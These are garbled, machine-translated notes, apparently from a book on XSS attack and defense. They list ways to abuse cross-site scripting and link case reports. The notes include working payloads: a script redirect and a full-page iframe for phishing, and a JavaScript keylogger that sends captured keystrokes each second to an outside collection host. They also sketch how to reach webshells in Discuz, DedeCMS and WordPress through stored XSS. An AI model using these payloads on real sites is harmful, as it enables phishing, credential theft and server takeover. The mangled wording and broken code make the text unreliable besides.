XSS can execute arbitrary JS code in client execution
How to use 0x01 XSS
1. Fishing Case: http://www.wooyun.org/bugs/wooyun-2014-076685 How I scan the intranet and creep to the front desk via an XSS detection Sohu intranet
2. Fishing, forged operation interface Fishing
Direct jump
<script>document.location.href= "Http://test.com/xxx.htm"
IFRAME Fishing
<iframe src= "http://test.com/11.htm" heigt= "100%" width= "100%" >
Flash Fishing
http://www.wooyun.org/bugs/wooyun-2010-02532
3. Projectile Advertising Brush Flow
4. Any post/get operation
such as in DZ in the background of the storage type XSS can get Uckey, or get Webshell case
http://www.wooyun.org/bugs/wooyun-2010-045716
In Dedecms, a store XSS with background file Manager Getshell
Case: Dedecms using XSS+CSRF Getshell
http://huakai.paxmac.org/?p=587
Wordpess The XSS Mate template is stored in the Getshell
The 5.HTML5 can also
6. Stealing cookies
The blind type of XSS
7.XSS Keylogger
{ get = window.event?event:e;
key = Get.keycode?get.keycode:get.charcode;
Key = String.fromCharCode (key);
Keys+=key;} Window.setinterval (function ()
{
New Image (). src = ' http://yourhost.com/g.php?c= ' +keys; Keys = ";}, 1000);
8. Spying on client information
Scan Intranet
Auto-Submit St2 Vulnerability (case listed in Heige ppt)
IP Address
10.ddos
XSS Cross-site scripting attacks and defense reading notes (original)